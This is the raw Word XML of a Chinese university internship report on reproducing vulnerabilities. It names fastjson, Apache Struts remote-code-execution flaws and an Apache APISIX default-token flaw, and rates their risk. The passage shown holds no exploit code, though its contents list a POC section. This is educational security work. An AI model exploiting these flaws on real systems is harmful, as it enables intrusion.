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D24E7" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B5DA010" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F"/>
    <w:p w14:paraId="41D2601A" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F"/>
    <w:p w14:paraId="3EBD9A90" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ADF6D58" w14:textId="77777777" w:rsidR="00FE1C0F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南开大学</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38727314" w14:textId="77777777" w:rsidR="00FE1C0F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实习实训漏洞复现报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B5A341" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00000000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br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6844B80C" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F55907B" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00949CA6" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="604A373D" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A35FC13" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24142CD6" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3508CF9B" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E113A30" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65F204D9" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10B0E8A1" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DD91C43" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D1E23E3" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48538485" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F"/>
    <w:p w14:paraId="470FBFFA" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F"/>
    <w:p w14:paraId="4244B59C" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60F7E8B4" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21A722BA" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23EBEB2D" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CA9DA44" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B273008" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F"/>
    <w:p w14:paraId="796A67C3" w14:textId="5681F846" w:rsidR="00FE1C0F" w:rsidRDefault="00000000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022</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r w:rsidR="0075516F">
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r w:rsidR="0075516F">
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021BA146" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00000000">
      <w:pPr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/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="7906B09A" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00000000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10B1EA4E" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
              <w:bCs/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:cstheme="majorEastAsia" w:hint="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cstheme="majorEastAsia" w:hint="eastAsia"/>
              <w:bCs/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc28487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漏洞复现结论（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_Toc28487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4765B2D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481" w:history="1">
            <w:r>
              <w:t>1.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>风险等级分布</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc7481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B94809A" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc24528" w:history="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工作计划（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_Toc24528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B1650B7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3939" w:history="1">
            <w:r>
              <w:t>2.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>工作人员</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc13939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2233BDF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137" w:history="1">
            <w:r>
              <w:t>2.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞对象</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3137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CBCA71C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909" w:history="1">
            <w:r>
              <w:t>2.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞复现阶段</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc7909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C63D9DB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60" w:history="1"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风险等级</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc1860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DA963A0" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc6133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漏洞复现过程（</w:t>
            </w:r>
            <w:r>
              <w:t>3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_Toc6133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65FCC64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532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风险管理及规避</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc18532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4430D4F2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4033" w:history="1"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>测试方法</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc4033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0661FBB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445" w:history="1"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测试中所用的工具</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc28445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8DC1E48" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12892" w:history="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漏洞复现结果（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_Toc12892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F825F5C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2666" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>4.1 POC</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>插件编写</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc32666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79136E5" w14:textId="77777777" w:rsidR="00FE1C0F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5120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漏洞信息</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc25120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8F3CD61" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00000000">
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="2C1AC214" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="199449D1" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F"/>
    <w:p w14:paraId="68E09484" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00FE1C0F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:sectPr w:rsidR="00FE1C0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E71A2" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc14593"/>
      <w:bookmarkStart w:id="1" w:name="_Toc32228"/>
      <w:bookmarkStart w:id="2" w:name="_Toc28487"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现结论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"/>
    </w:p>
    <w:p w14:paraId="761B599F" w14:textId="77777777" w:rsidR="00D91C9D" w:rsidRDefault="00D91C9D">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91C9D">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>南开大学第五组的安全人员采用科学的漏洞复现步骤于</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91C9D">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2024</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91C9D">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91C9D">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91C9D">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91C9D">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91C9D">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>日至</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91C9D">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2024</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91C9D">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91C9D">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91C9D">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91C9D">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91C9D">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>日对目标漏洞进行了全面深入的漏洞复现。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D3B2FC" w14:textId="3CB5D11F" w:rsidR="00FE1C0F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>本次共发现漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00D91C9D">
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia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个，其高危漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00D91C9D">
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个，中危漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00D91C9D">
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>低危漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00D91C9D">
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个。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4714"/>
        <w:gridCol w:w="2213"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FE1C0F" w14:paraId="63625541" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E86509A" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="0000000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bookmarkStart w:id="3" w:name="_Hlk482954515"/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41CF02E1" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="0000000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3DAE50E6" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="21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风险值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE1C0F" w14:paraId="7E2D2B60" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="713"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1595" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E6D8650" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00000000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714" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5AC693E3" w14:textId="1C2EF3D6" w:rsidR="00FE1C0F" w:rsidRDefault="001D104F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 w:rsidRPr="001D104F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>fastjson&lt;=1.2.62</w:t>
            </w:r>
            <w:r w:rsidRPr="001D104F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>远程代码执行漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2213" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F2449BA" w14:textId="63F286A0" w:rsidR="00FE1C0F" w:rsidRDefault="00EE1B48">
            <w:pPr>
              <w:spacing w:after="156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</w:tr>
      <w:tr w:rsidR="0022644F" w14:paraId="589989B1" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="713"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1595" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68B1A42A" w14:textId="6515DC50" w:rsidR="0022644F" w:rsidRDefault="0022644F">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:spacing w:after="120"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts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714" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01F3BC66" w14:textId="01CD28E5" w:rsidR="0022644F" w:rsidRPr="001D104F" w:rsidRDefault="00186490">
            <w:pPr>
              <w:spacing w:after="156"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00186490">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Apache Struts</w:t>
            </w:r>
            <w:r w:rsidRPr="00186490">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>远程代码执行漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2213" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E8F400F" w14:textId="64B35223" w:rsidR="0022644F" w:rsidRDefault="0022644F">
            <w:pPr>
              <w:spacing w:after="156"/>
              <w:jc w:val="center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</w:tr>
      <w:tr w:rsidR="0022644F" w14:paraId="1516A0CF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="713"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1595" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15444104" w14:textId="12B1C454" w:rsidR="0022644F" w:rsidRDefault="0022644F">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:spacing w:after="120"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts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4714" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="767EF7A3" w14:textId="53BEE445" w:rsidR="0022644F" w:rsidRPr="001D104F" w:rsidRDefault="00186490">
            <w:pPr>
              <w:spacing w:after="156"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00186490">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Apache APISIX Admin API </w:t>
            </w:r>
            <w:r w:rsidRPr="00186490">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>默认</w:t>
            </w:r>
            <w:r w:rsidRPr="00186490">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Token</w:t>
            </w:r>
            <w:r w:rsidRPr="00186490">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2213" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7FEF2976" w14:textId="47D82666" w:rsidR="0022644F" w:rsidRDefault="0022644F">
            <w:pPr>
              <w:spacing w:after="156"/>
              <w:jc w:val="center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</w:tr>
    </w:tbl>
    <w:p w14:paraId="64548B79" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc16656"/>
      <w:bookmarkStart w:id="5" w:name="_Toc5011"/>
      <w:bookmarkStart w:id="6" w:name="_Toc7481"/>
      <w:bookmarkEnd w:id="3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1A777B9F" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本次评估漏洞的详细风险等级分布如下：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F35D50" w14:paraId="616AF3FA" w14:textId="77777777" w:rsidTr="00AB1914">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="71B86E70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攻击路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4B71A244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远程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F35D50" w14:paraId="49C9D416" w14:textId="77777777" w:rsidTr="00AB1914">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5F1E9F86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攻击复杂度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="34DAD27D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容易</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
